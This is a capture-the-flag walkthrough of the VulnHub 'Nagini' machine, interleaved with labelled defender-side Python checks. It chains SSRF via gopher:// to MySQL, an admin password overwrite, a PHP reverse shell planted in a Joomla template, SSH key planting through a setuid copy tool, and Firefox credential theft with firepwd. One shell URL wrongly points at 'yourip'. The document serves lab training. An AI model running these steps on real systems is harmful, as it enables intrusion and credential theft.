VulnHub: HarryPotter: Nagini

Today we will take a look at VulnHub: Nagini. My goal in sharing this writeup is to help you if you get stuck. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open --open 192.168.0.110

  • Gobuster

Command: gobuster dir -u http://192.168.0.110 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

We found a file here: note.txt

Hello developers!!

I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.

Regards,
site_admin

Here we see HTTP3 mentioned; let's research it.

Let’s download and setup.

Command: git clone --recursive https://github.com/cloudflare/quiche

Command: cargo build --examples

Command: cd target/debug/examples

Command: ./http3-client https://192.168.0.110/

<html>
<head>
<title>Information Page</title>
</head>
<body>
Greetings Developers!!

I am having two announcements that I need to share with you:

1. We no longer require functionality at /internalResourceFeTcher.php in our main production servers.So I will be removing the same by this week.
2. All developers are requested not to put any configuration’s backup file (.bak) in main production servers as they are readable by every one.

Regards,
site_admin
</body>
</html>

Browsing to /internalResourceFeTcher.php, we see a form with a button. I first thought it was command injection, but that did not work. I then suspected SSRF, so I entered 127.0.0.1 and observed the result:

We also found the /joomla directory. The .bak file mentioned in the announcement should be here. Let's check:

Command: joomscan -u http://192.168.0.110/joomla/

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.25

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.0.110/joomla/administrator/components
http://192.168.0.110/joomla/administrator/modules
http://192.168.0.110/joomla/administrator/templates
http://192.168.0.110/joomla/tmp
http://192.168.0.110/joomla/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.0.110/joomla/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.0.110/joomla/robots.txt

Interesting path found from robots.txt
http://192.168.0.110/joomla/joomla/administrator/
http://192.168.0.110/joomla/administrator/
http://192.168.0.110/joomla/bin/
http://192.168.0.110/joomla/cache/
http://192.168.0.110/joomla/cli/
http://192.168.0.110/joomla/components/
http://192.168.0.110/joomla/includes/
http://192.168.0.110/joomla/installation/
http://192.168.0.110/joomla/language/
http://192.168.0.110/joomla/layouts/
http://192.168.0.110/joomla/libraries/
http://192.168.0.110/joomla/logs/
http://192.168.0.110/joomla/modules/
http://192.168.0.110/joomla/plugins/
http://192.168.0.110/joomla/tmp/


[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path : http://192.168.0.110/joomla/configuration.php.bak

Let’s download the .bak file and look at its contents.

The part we need:

public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'goblin';
public $password = '';
public $db = 'joomla';
public $dbprefix = 'joomla_';
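The exposed backup hands anyone who can read it the database connection, complete with an empty password. As an added defender-side example (Python, not Joomla's own code and not part of the original writeup), here is a small audit that parses a Joomla configuration.php (or its .bak copy) for weak settings and lists backup copies of server-side files that the web server would serve as plain text; the sample config is constructed from the values above.

```python
import re

# Joomla stores settings as PHP class properties: public $name = 'value';
_PROP = re.compile(r"public\s+\$(\w+)\s*=\s*(?:'([^']*)'|\"([^\"]*)\"|(\d+))\s*;")

# Suffixes that mark manual or editor backups of code; the web server hands
# these out as text instead of executing them.
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", ".swp", "~")

# Constructed sample, mirroring the values recovered from configuration.php.bak.
SAMPLE_CONFIG = """<?php
class JConfig {
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'goblin';
    public $password = '';
    public $db = 'joomla';
    public $dbprefix = 'joomla_';
    public $debug = '0';
}
"""


def parse_joomla_config(text):
    """Return the scalar settings of a Joomla configuration.php as a dict."""
    settings = {}
    for name, sq, dq, num in _PROP.findall(text):
        settings[name] = sq or dq or num or ""
    return settings


def audit_config(settings):
    """Return findings for the weaknesses that made the database a one-step
    target once the config leaked."""
    findings = []
    if settings.get("password", "") == "":
        findings.append("database user %r has an empty password"
                        % settings.get("user", "?"))
    if settings.get("user") == "root":
        findings.append("database user is root")
    if settings.get("debug") == "1":
        findings.append("debug mode is enabled")
    return findings


def find_backup_copies(paths):
    """Given relative paths under a web root (for example from os.walk),
    return those that look like backups of server-side files."""
    return sorted(p for p in paths if p.endswith(BACKUP_SUFFIXES))
```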

We have an SSRF, and now we also have the database credentials: user goblin with an empty password on localhost. We will use the SSRF to reach MySQL and view and modify the database data.

For this we will use Gopherus:

Command: git clone https://github.com/tarunkant/Gopherus.git

Command: python2 gopherus.py --exploit mysql

Enter the MySQL username (goblin) and the query to run; Gopherus prints a gopher:// payload.

Paste the payload into the fetcher form and submit it to get the query output.

Now we will run further queries to get more detailed information.
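The fetcher accepts any URL, which is why a gopher:// payload can reach MySQL on localhost. As an added defender-side example (Python, not the box's PHP and not Gopherus code), here is the URL validation such a fetcher should perform before making a request; the `resolver` parameter is an assumption that lets the check run without DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def _system_resolver(host):
    # Every record a host resolves to must be public, not just the first one.
    return [ai[4][0] for ai in socket.getaddrinfo(host, None)]


def _is_internal(addr):
    # Treat IPv4-mapped IPv6 (::ffff:127.0.0.1) as the IPv4 address it wraps.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def is_safe_fetch_url(url, resolver=_system_resolver):
    """Return (ok, reason) for a user-supplied URL a server-side fetcher is
    about to request. Rejects what turned the fetcher into an SSRF primitive:
    non-HTTP schemes such as gopher://, service ports such as 3306, and
    loopback/private destinations, whether given literally or via DNS."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port  # .port raises on junk
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if not host:
        return False, "missing host"
    if port not in ALLOWED_PORTS:
        return False, "port %s not allowed" % port
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP address
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError):
            return False, "host does not resolve"
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if _is_internal(addr):
            return False, "%s is not a public address" % addr
    # Connect to one of the validated addresses, not to the hostname again,
    # or a DNS answer that changes between check and fetch defeats the check.
    return True, "ok"
```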

I tried to crack the hash here but could not. Instead, I will update the password directly:

Command: use joomla;update joomla_users set password='5f4dcc3b5aa765d61d8327deb882cf99' where username='site_admin'

The password has now been changed. Let's log in as an administrator.
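A direct write to joomla_users bypasses Joomla's own hashing, so the stored value above is a bare 32-character MD5 rather than the bcrypt that Joomla 3.9 produces, and Joomla still accepts such legacy formats at login. As an added detection example (Python, not Joomla code and not part of the writeup), here is a check over the password column that flags legacy hash formats and the accounts carrying them; the sample rows are constructed.

```python
import re

# Hash shapes Joomla 3.x will still verify, newest first. Joomla 3 writes
# bcrypt; anything else in the column was written by an older Joomla or by
# something other than Joomla, such as a direct SQL update.
_FORMATS = (
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")),
    ("phpass", re.compile(r"^\$P\$[./A-Za-z0-9]{31}$")),
    ("md5-salted", re.compile(r"^[0-9a-f]{32}:.+$")),
    ("md5-unsalted", re.compile(r"^[0-9a-f]{32}$")),
)

# Constructed sample rows (username, password column). The bcrypt value is a
# shape-correct placeholder, not a real hash.
SAMPLE_ROWS = [
    ("hagrid", "$2y$10$" + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"),
    ("site_admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("legacy_user", "0123456789abcdef0123456789abcdef:somesalt"),
]


def classify_hash(value):
    """Name the format of a joomla_users.password value, or 'unknown'."""
    for name, pattern in _FORMATS:
        if pattern.match(value):
            return name
    return "unknown"


def audit_user_hashes(rows):
    """Return (username, format) for accounts whose stored hash is not
    bcrypt: candidates for a forced reset and for checking who wrote them."""
    flagged = []
    for user, pw in rows:
        kind = classify_hash(pw)
        if kind != "bcrypt":
            flagged.append((user, kind))
    return flagged
```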

  • Reverse shell

Extensions -> Templates -> Protostar -> New File

Paste a PHP reverse shell into the new file, change the IP address to your own, and save it as rev.php. Then browse to this URL:

URL: http://yourip/joomla/templates/protostar/rev.php

Once inside, upgrade the shell:

Command: script /dev/null -c bash

Command: export TERM=xterm

  • Snape

Command: cd /home/snape

Command: cat .creds.txt

Decode it from Base64:

Pass: Love@lilly

Command: su snape

  • Hermoine

Command: ssh-keygen -f hermoine

Command: python3 -m http.server 80

On the target:

Command: cd /home/snape/

Command: wget http://192.168.0.107/hermoine.pub

Command: mv hermoine.pub authorized_keys

Command: chmod 640 authorized_keys

Command: cd /home/hermoine/bin/

Command: ./su_cp -p -r /home/snape/authorized_keys /home/hermoine/.ssh/

  • SSH

Command: ssh hermoine@192.168.0.110 -i hermoine

  • Root

There was a .mozilla folder in hermoine's home directory. Looking inside it, I found the following files:

Command: cd /home/hermoine/.mozilla/firefox/g2mhbq0o.default

key4.db

logins.json

I need to transfer these two files to my local machine to crack the passwords.

Command: python3 -m http.server

I will use firepwd to decrypt them:

Command: git clone https://github.com/lclevy/firepwd/

Command: sudo pip install -r requirements.txt

After downloading the two files from the target machine, run the tool:

Command: python firepwd.py

Here we find the root password.

Command: su root

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”

Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
